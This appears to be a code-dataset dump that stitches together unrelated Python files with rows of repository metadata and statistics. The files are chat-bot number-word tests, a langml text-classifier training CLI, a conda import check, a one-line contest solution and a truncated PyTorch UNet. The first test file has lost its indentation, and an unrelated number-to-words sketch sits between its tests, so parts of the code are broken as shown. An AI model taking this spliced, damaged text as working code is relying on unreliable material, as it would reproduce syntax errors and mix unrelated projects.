test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 british")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one thousand million." == data[0].text.lower()
), "Number word failing for british formatting."
def test_number_european(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 1000000000 european")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"one milliard." == data[0].text.lower()
), "Number word failing for european formatting."
def test_number_calculation(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number 17*5")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"eighty-five." == data[0].text.lower()
), "Number word failing for calculations."
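The word forms asserted above can be reproduced, for small values, by a self-contained converter. This is an illustrative sketch covering only -99 to 99, not the module's actual implementation (which also handles large numbers, floats and locale formats):

```python
ONES = ["zero", "one", "two", "three", "four", "five", "six", "seven",
        "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen",
        "fifteen", "sixteen", "seventeen", "eighteen", "nineteen"]
TENS = ["", "", "twenty", "thirty", "forty", "fifty",
        "sixty", "seventy", "eighty", "ninety"]

def small_number_word(n: int) -> str:
    """Spell out an integer in the range -99..99."""
    if n < 0:
        return "negative " + small_number_word(-n)
    if n < 20:
        return ONES[n]
    tens, ones = divmod(n, 10)
    if ones:
        return TENS[tens] + "-" + ONES[ones]
    return TENS[tens]
```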
def test_number_fail(hallo_getter):
test_hallo = hallo_getter({"math"})
test_hallo.function_dispatcher.dispatch(
EventMessage(test_hallo.test_server, None, test_hallo.test_user, "number seventeen")
)
data = test_hallo.test_server.get_send_data(1, test_hallo.test_user, EventMessage)
assert (
"error" in data[0].text.lower()
), "Number word not outputting error for non-numeric input."
| 39.186441 | 102 | 0.718209 | 616 | 4,624 | 5.095779 | 0.12013 | 0.186365 | 0.182224 | 0.133163 | 0.809493 | 0.809493 | 0.809493 | 0.800573 | 0.735585 | 0.735585 | 0 | 0.01902 | 0.169983 | 4,624 | 117 | 103 | 39.521368 | 0.798854 | 0 | 0 | 0.453608 | 0 | 0 | 0.181445 | 0 | 0 | 0 | 0 | 0 | 0.113402 | 1 | 0.103093 | false | 0 | 0.010309 | 0 | 0.113402 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2400d04e5a116d3d0ced28f679899b364386ffd1 | 21,164 | py | Python | langml/langml/baselines/clf/cli.py | 4AI/TDEER | 81d3b3457e5308547d7d6695b31193bb34d98223 | [
"MIT"
] | 26 | 2021-11-07T12:04:11.000Z | 2022-03-25T09:49:14.000Z | langml/langml/baselines/clf/cli.py | alipay/TDEER | 8df3a9b758e06c48f507668e12702df640f740bc | [
"MIT"
] | 4 | 2021-12-22T02:44:30.000Z | 2022-03-07T06:14:42.000Z | langml/langml/baselines/clf/cli.py | 4AI/TDEER | 81d3b3457e5308547d7d6695b31193bb34d98223 | [
"MIT"
] | 6 | 2021-11-11T12:09:22.000Z | 2022-01-20T06:13:19.000Z | # -*- coding: utf-8 -*-
import os
import json
from typing import Optional
from shutil import copyfile
import click
from langml import TF_VERSION, TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
from langml.log import info
from langml.baselines import Parameters
from langml.baselines.clf import Infer, compute_detail_metrics
from langml.baselines.clf.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
from langml.tokenizer import WPTokenizer, SPTokenizer
MONITOR = 'val_accuracy' if not TF_KERAS or TF_VERSION > 1 else 'val_acc'
@click.group()
def clf():
"""classification command line tools"""
pass
@clf.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bert(backbone: str, epoch: int, batch_size: int, learning_rate: float, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], early_stop: int, use_micro: bool,
config_path: str, ckpt_path: str, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.bert import Bert
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = Bert(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('done training! starting to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=True)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--filter_size', type=int, default=100, help='filter size of convolution')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def textcnn(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
filter_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
from langml.baselines.clf.textcnn import TextCNN
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'filter_size': filter_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = TextCNN(params).build_model()
else:
model = TextCNN(params).build_model()
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = TextCNN(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('done training! starting to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@clf.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size of lstm')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--use_micro', is_flag=True, default=False, help='whether to use micro metrics')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
@click.option('--with_attention', is_flag=True, default=False, help='apply bilstm attention')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
def bilstm(epoch: int, batch_size: int, learning_rate: float, embedding_size: int,
hidden_size: int, max_len: Optional[int], lowercase: bool, tokenizer_type: Optional[str],
early_stop: int, use_micro: bool, vocab_path: str, train_path: str, dev_path: str,
test_path: str, save_dir: str, verbose: int, with_attention: bool, distribute: bool):
# check distribute
if distribute:
assert TF_KERAS, 'please `export TF_KERAS=1` to support distributed training!'
    from langml.baselines.clf.bilstm import BiLSTM
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BiLSTM(params).build_model(with_attention=with_attention)
else:
model = BiLSTM(params).build_model(with_attention=with_attention)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor=MONITOR,
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor=MONITOR,
mode='auto')
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BiLSTM(params).build_model(with_attention=with_attention)
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
info('done to training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
| 44 | 128 | 0.66873 | 2,680 | 21,164 | 5.084701 | 0.080597 | 0.042783 | 0.01952 | 0.018493 | 0.923608 | 0.918471 | 0.915168 | 0.90805 | 0.905335 | 0.891245 | 0 | 0.006416 | 0.212058 | 21,164 | 480 | 129 | 44.091667 | 0.810746 | 0.018947 | 0 | 0.879227 | 0 | 0 | 0.18145 | 0 | 0 | 0 | 0 | 0 | 0.014493 | 1 | 0.009662 | false | 0.002415 | 0.05314 | 0 | 0.062802 | 0.028986 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
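The `EarlyStopping` callback above halts training once the monitored metric fails to improve by more than `min_delta` for `patience` consecutive epochs. A minimal stdlib sketch of that logic, assuming a metric where higher is better (e.g. accuracy); `EarlyStopper` is an illustrative name, not part of langml or Keras:

```python
class EarlyStopper:
    """Stop after `patience` epochs without an improvement of more than `min_delta`."""

    def __init__(self, patience=10, min_delta=1e-4):
        self.patience = patience
        self.min_delta = min_delta
        self.best = None
        self.bad_epochs = 0

    def should_stop(self, metric):
        # An epoch counts as an improvement only if it beats the best by min_delta.
        if self.best is None or metric > self.best + self.min_delta:
            self.best = metric
            self.bad_epochs = 0
        else:
            self.bad_epochs += 1
        return self.bad_epochs >= self.patience
```

With `patience=2`, training stops on the second consecutive non-improving epoch, mirroring the callback's semantics.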
24121fe1bd38ec93fed03837b938d2ef79c1c70f | 149 | py | Python | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | null | null | null | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | 1 | 2019-04-02T23:35:13.000Z | 2019-04-02T23:35:13.000Z | pkgs/wheel-0.31.1-py37_0/info/test/run_test.py | AXGKl/be_black | 810df50ab33fe614786af5dc8216daff74db32df | [
"BSD-3-Clause"
] | null | null | null | print("import: 'wheel'")
import wheel
print("import: 'wheel.signatures'")
import wheel.signatures
print("import: 'wheel.tool'")
import wheel.tool
| 14.9 | 35 | 0.731544 | 19 | 149 | 5.736842 | 0.263158 | 0.605505 | 0.440367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.100671 | 149 | 9 | 36 | 16.555556 | 0.813433 | 0 | 0 | 0 | 0 | 0 | 0.412162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
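The `run_test.py` above is a conda-build smoke test: it simply imports each submodule and fails if any import raises. The same idea can be parameterized with `importlib`; this is a hedged sketch and `smoke_test` is an illustrative helper, not part of the `wheel` package:

```python
import importlib


def smoke_test(modules):
    """Try importing each named module; return the list of names that failed."""
    failed = []
    for name in modules:
        try:
            importlib.import_module(name)
        except ImportError:
            failed.append(name)
    return failed
```

For the file above, `smoke_test(["wheel", "wheel.signatures", "wheel.tool"])` would return an empty list in a working install.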
2452bdab2851f574ec520fc26d8dc2db445c8fb7 | 39 | py | Python | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | atcoder/abc/a085.py | tomato-300yen/coding | db6f440a96d8c83f486005c650461a69f27e3926 | [
"MIT"
] | null | null | null | print(input().replace("2017", "2018"))
| 19.5 | 38 | 0.641026 | 5 | 39 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.216216 | 0.051282 | 39 | 1 | 39 | 39 | 0.459459 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
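The one-liner above relies on `str.replace`, which returns a new string with every occurrence of the substring substituted; the contest input is a date string containing "2017" exactly once, so a blanket replace is safe. A sketch of the same transformation as a named function (`fix_year` is an illustrative name):

```python
def fix_year(s: str) -> str:
    # str.replace substitutes all occurrences of "2017" and returns a new string.
    return s.replace("2017", "2018")
```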
79fe199c09201481d9e30428e6c7ccb12cb22e3f | 26,944 | py | Python | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 67 | 2020-08-29T19:25:49.000Z | 2022-03-21T06:36:42.000Z | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 20 | 2020-09-24T09:55:04.000Z | 2022-03-21T05:49:22.000Z | model/unet.py | AnonymousAuthors444/VEC_VAD | 0072bf857030e621e2f9c12689407b81e45ed603 | [
"MIT"
] | 21 | 2020-09-14T08:07:35.000Z | 2022-03-16T12:24:16.000Z | import torch
import torch.nn as nn
class double_conv(nn.Module):
    '''(conv => BN => ReLU) * 2'''

    def __init__(self, in_ch, out_ch):
        super(double_conv, self).__init__()
        self.conv = nn.Sequential(
            nn.Conv2d(in_channels=in_ch, out_channels=out_ch, kernel_size=3, padding=1),
            nn.BatchNorm2d(out_ch),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=out_ch, out_channels=out_ch, kernel_size=3, padding=1),
            nn.BatchNorm2d(out_ch),
            nn.ReLU(inplace=True),
        )

    def forward(self, x):
        x = self.conv(x)
        return x
class inconv(nn.Module):
    '''
    inconv only changes the number of channels
    '''

    def __init__(self, in_ch, out_ch):
        super(inconv, self).__init__()
        self.conv = double_conv(in_ch, out_ch)

    def forward(self, x):
        x = self.conv(x)
        return x
class down(nn.Module):
    def __init__(self, in_ch, out_ch):
        super(down, self).__init__()
        self.mpconv = nn.Sequential(
            nn.MaxPool2d(kernel_size=2),
            double_conv(in_ch, out_ch),
        )

    def forward(self, x):
        x = self.mpconv(x)
        return x
class up(nn.Module):
    def __init__(self, in_ch, out_ch, bilinear=False):
        super(up, self).__init__()
        self.bilinear = bilinear
        if self.bilinear:
            self.up = nn.Sequential(
                nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
                nn.Conv2d(in_ch, in_ch // 2, 1),
            )
        else:
            self.up = nn.ConvTranspose2d(in_channels=in_ch, out_channels=in_ch // 2, kernel_size=3,
                                         stride=2, padding=1, output_padding=1)
        self.conv = double_conv(in_ch, out_ch)

    def forward(self, x1, x2):
        x1 = self.up(x1)
        x = torch.cat([x2, x1], dim=1)
        x = self.conv(x)
        return x
class outconv(nn.Module):
    def __init__(self, in_ch, out_ch):
        super(outconv, self).__init__()
        self.conv = nn.Conv2d(in_ch, out_ch, 1)

    def forward(self, x):
        x = self.conv(x)
        return x
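The blocks above double the channel count at every `down` step and halve it at every `up` step, so a depth-3 encoder built from `features_root` channels yields exactly the (in, out) pairs wired into `down01..down03` and `up01..up03` below. A small stdlib sketch of that bookkeeping; `unet_channel_plan` is an illustrative helper, not part of this module:

```python
def unet_channel_plan(features_root, depth=3):
    """Return (in_ch, out_ch) pairs for the down path and the mirrored up path."""
    down_pairs = [(features_root * 2 ** i, features_root * 2 ** (i + 1)) for i in range(depth)]
    # The decoder consumes channels in reverse, halving at each step.
    up_pairs = [(out_ch, in_ch) for (in_ch, out_ch) in reversed(down_pairs)]
    return down_pairs, up_pairs
```

With `features_root=32` this reproduces the 32→64→128→256 encoder and 256→128→64→32 decoder used throughout the file.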
class SelfCompleteNet4(nn.Module):  # 5raw1of
    def __init__(self, features_root=32, tot_raw_num=5, tot_of_num=1, border_mode='predict',
                 rawRange=None, useFlow=True, padding=True):
        super(SelfCompleteNet4, self).__init__()
        assert tot_of_num <= tot_raw_num
        if border_mode == 'predict':
            self.raw_center_idx = tot_raw_num - 1
            self.of_center_idx = tot_of_num - 1
        else:
            self.raw_center_idx = (tot_raw_num - 1) // 2
            self.of_center_idx = (tot_of_num - 1) // 2
        if rawRange is None:
            self.rawRange = range(tot_raw_num)
        else:
            if rawRange < 0:
                rawRange += tot_raw_num
            assert rawRange < tot_raw_num
            self.rawRange = range(rawRange, rawRange + 1)
        self.raw_channel_num = 3  # RGB channel number.
        self.of_channel_num = 2  # optical flow channel number.
        self.tot_of_num = tot_of_num
        self.tot_raw_num = tot_raw_num
        self.raw_of_offset = self.raw_center_idx - self.of_center_idx
        self.useFlow = useFlow
        self.padding = padding
        assert self.raw_of_offset >= 0

        if self.padding:
            in_channels = self.raw_channel_num * tot_raw_num
        else:
            in_channels = self.raw_channel_num * (tot_raw_num - 1)
        raw_out_channels = self.raw_channel_num
        of_out_channels = self.of_channel_num

        # Different types of incomplete video events, each corresponding to a separate UNet.
        # Raw pixel completion.
        self.inc0 = inconv(in_channels, features_root)
        self.down01 = down(features_root, features_root * 2)
        self.down02 = down(features_root * 2, features_root * 4)
        self.down03 = down(features_root * 4, features_root * 8)

        self.inc1 = inconv(in_channels, features_root)
        self.down11 = down(features_root, features_root * 2)
        self.down12 = down(features_root * 2, features_root * 4)
        self.down13 = down(features_root * 4, features_root * 8)

        self.inc2 = inconv(in_channels, features_root)
        self.down21 = down(features_root, features_root * 2)
        self.down22 = down(features_root * 2, features_root * 4)
        self.down23 = down(features_root * 4, features_root * 8)

        self.inc3 = inconv(in_channels, features_root)
        self.down31 = down(features_root, features_root * 2)
        self.down32 = down(features_root * 2, features_root * 4)
        self.down33 = down(features_root * 4, features_root * 8)

        self.inc4 = inconv(in_channels, features_root)
        self.down41 = down(features_root, features_root * 2)
        self.down42 = down(features_root * 2, features_root * 4)
        self.down43 = down(features_root * 4, features_root * 8)

        self.up01 = up(features_root * 8, features_root * 4)
